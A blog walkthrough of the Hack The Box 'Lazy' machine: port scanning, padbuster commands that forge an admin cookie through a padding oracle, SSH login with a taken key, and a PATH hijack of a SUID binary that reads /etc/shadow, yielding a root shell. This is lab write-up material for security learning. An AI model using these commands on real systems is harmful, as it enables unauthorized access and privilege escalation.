Posts Lazy
Post
Cancel

Lazy

Walkthrough

Enumration

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
argenestel@parrot  ~/Desktop/hackthebox/lazy  rustscan  10.10.10.18
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
Faster Nmap scanning with Rust.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍

[~] The config file is expected to be at "/home/argenestel/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 10.10.10.18:22
Open 10.10.10.18:80
[~] Starting Nmap
[>] The Nmap command to be run is nmap -vvv -p 22,80 10.10.10.18

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-13 00:14 IST
Initiating Ping Scan at 00:14
Scanning 10.10.10.18 [2 ports]
Completed Ping Scan at 00:14, 0.49s elapsed (1 total hosts)
Initiating Connect Scan at 00:14
Scanning lazy.htb (10.10.10.18) [2 ports]
Discovered open port 22/tcp on 10.10.10.18
Discovered open port 80/tcp on 10.10.10.18
Completed Connect Scan at 00:14, 0.31s elapsed (2 total ports)
Nmap scan report for lazy.htb (10.10.10.18)
Host is up, received conn-refused (0.44s latency).
Scanned at 2020-10-13 00:14:18 IST for 0s

PORT   STATE SERVICE REASON
22/tcp open  ssh     syn-ack
80/tcp open  http    syn-ack

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
argenestel@parrot  ~/Desktop/hackthebox/lazy  nmap -sC -sV -p22,80  10.10.10.18
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-13 00:14 IST
Nmap scan report for lazy.htb (10.10.10.18)
Host is up (0.42s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 e1:92:1b:48:f8:9b:63:96:d4:e5:7a:40:5f:a4:c8:33 (DSA)
|   2048 af:a0:0f:26:cd:1a:b5:1f:a7:ec:40:94:ef:3c:81:5f (RSA)
|   256 11:a3:2f:25:73:67:af:70:18:56:fe:a2:e3:54:81:e8 (ECDSA)
|_  256 96:81:9c:f4:b7:bc:1a:73:05:ea:ba:41:35:a4:66:b7 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: CompanyDev
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.65 seconds
argenestel@parrot  ~/Desktop/hackthebox/lazy 

So two ports are open 22 and 80

Port 80

So we can see a site

Dirbusting it with php extenion

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
argenestel@parrot  ~/Desktop/hackthebox/lazy  ffuf -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.18/FUZZ.php

       /'___\  /'___\           /'___\       
      /\ \__/ /\ \__/  __  __  /\ \__/       
      \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
       \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
        \ \_\   \ \_\  \ \____/  \ \_\       
         \/_/    \/_/   \/___/    \/_/       

      v1.0.2
________________________________________________

:: Method           : GET
:: URL              : http://10.10.10.18/FUZZ.php
:: Follow redirects : false
:: Calibration      : false
:: Timeout          : 10
:: Threads          : 40
:: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

.htaccess               [Status: 403, Size: 291, Words: 21, Lines: 11]
.htpasswd               [Status: 403, Size: 291, Words: 21, Lines: 11]
footer                  [Status: 200, Size: 51, Words: 19, Lines: 8]
header                  [Status: 200, Size: 734, Words: 239, Lines: 23]
index                   [Status: 200, Size: 1117, Words: 303, Lines: 42]
login                   [Status: 200, Size: 1548, Words: 416, Lines: 59]
logout                  [Status: 302, Size: 734, Words: 239, Lines: 23]
register                [Status: 200, Size: 1592, Words: 406, Lines: 61]
:: Progress: [20469/20469] :: Job [1/1] :: 152 req/sec :: Duration: [0:02:14] :: Errors: 0 ::

register and login on changing the auth cookie we landed on invalid.
so we found out about oracle padding attack

using padbuster to get the auth cookie

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
✘ argenestel@parrot  ~/Desktop/hackthebox/lazy  padbuster http://10.10.10.18/login.php 1hcGpO3BllzMF4pB9EoWPek8Ar%2FcCi19 8 --cookie auth=1hcGpO3BllzMF4pB9EoWPek8Ar%2FcCi19 --encoding 0

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 1486

INFO: Starting PadBuster Decrypt Mode
*** Starting Block 1 of 2 ***

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     1564    N/A
2 **    255     200     15      N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (208/256) [Byte 8]
[+] Success: (16/256) [Byte 7]
[+] Success: (93/256) [Byte 6]
[+] Success: (44/256) [Byte 5]
[+] Success: (45/256) [Byte 4]
[+] Success: (155/256) [Byte 3]
[+] Success: (157/256) [Byte 2]
[+] Success: (85/256) [Byte 1]

Block 1 Results:
[+] Cipher Text (HEX): cc178a41f44a163d
[+] Intermediate Bytes (HEX): a36463d6d0a0f231
[+] Plain Text: user=adm

Use of uninitialized value $plainTextBytes in concatenation (.) or string at /usr/bin/padbuster line 361, <STDIN> line 1.
*** Starting Block 2 of 2 ***

[+] Success: (193/256) [Byte 8]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
✘ argenestel@parrot  ~/Desktop/hackthebox/lazy  padbuster http://10.10.10.18/login.php 1hcGpO3BllzMF4pB9EoWPek8Ar%2FcCi19 8 --cookie auth=1hcGpO3BllzMF4pB9EoWPek8Ar%2FcCi19 --encoding 0 -plaintext user=admin

+-------------------------------------------+
| PadBuster - v0.3.3                        |
| Brian Holyfield - Gotham Digital Science  |
| labs@gdssecurity.com                      |
+-------------------------------------------+

INFO: The original request returned the following
[+] Status: 200
[+] Location: N/A
[+] Content Length: 1486

INFO: Starting PadBuster Encrypt Mode
[+] Number of Blocks: 2

INFO: No error string was provided...starting response analysis

*** Response Analysis Complete ***

The following response signatures were returned:

-------------------------------------------------------
ID#     Freq    Status  Length  Location
-------------------------------------------------------
1       1       200     1564    N/A
2 **    255     200     15      N/A
-------------------------------------------------------

Enter an ID that matches the error condition
NOTE: The ID# marked with ** is recommended : 2

Continuing test with selection 2

[+] Success: (196/256) [Byte 8]
[+] Success: (148/256) [Byte 7]
[+] Success: (92/256) [Byte 6]
[+] Success: (41/256) [Byte 5]
[+] Success: (218/256) [Byte 4]
[+] Success: (136/256) [Byte 3]
[+] Success: (150/256) [Byte 2]
[+] Success: (190/256) [Byte 1]

Block 2 Results:
[+] New Cipher Text (HEX): 23037825d5a1683b
[+] Intermediate Bytes (HEX): 4a6d7e23d3a76e3d

[+] Success: (1/256) [Byte 8]
[+] Success: (36/256) [Byte 7]
[+] Success: (180/256) [Byte 6]
[+] Success: (17/256) [Byte 5]
[+] Success: (146/256) [Byte 4]
[+] Success: (50/256) [Byte 3]
[+] Success: (132/256) [Byte 2]
^[[B[+] Success: (135/256) [Byte 1]

Block 1 Results:
[+] New Cipher Text (HEX): 0408ad19d62eba93
[+] Intermediate Bytes (HEX): 717bc86beb4fdefe

-------------------------------------------------------
** Finished ***

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
-------------------------------------------------------

so using this token we login as admin and grab sshkey of user.

PrivEsc

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
✘ argenestel@parrot  ~/Desktop/hackthebox/lazy  ssh -i mysshkeywithnamemitsos mitsos@10.10.10.18
load pubkey "mysshkeywithnamemitsos": invalid format
The authenticity of host '10.10.10.18 (10.10.10.18)' can't be established.
ECDSA key fingerprint is SHA256:OJ5DTyZUGZXEpX4BKFNTApa88gR/+w5vcNathKIPcWE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.18' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

* Documentation:  https://help.ubuntu.com/

 System information as of Mon Oct 12 20:16:50 EEST 2020

 System load: 0.0               Memory usage: 4%   Processes:       192
 Usage of /:  7.6% of 18.58GB   Swap usage:   0%   Users logged in: 0

 Graph this data and manage this system at:
   https://landscape.canonical.com/

Last login: Thu Jan 18 10:29:40 2018
mitsos@LazyClown:~$

We have a suid backup file which cat out /etc/shadow though it contains hashes seems like cracking them is not at all easy.

when we try strings we get it is doing

1
cat /etc/shadow

so i changed the path variable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

export PATH=/tmp:$PATH
# echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games


/bin/cat /tmp/cat

#!/bin/sh
/bin/sh


mitsos@LazyClown:~$ ./backup
# id
uid=1000(mitsos) gid=1000(mitsos) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare),1000(mitsos)

This post is licensed under CC BY 4.0 by the author.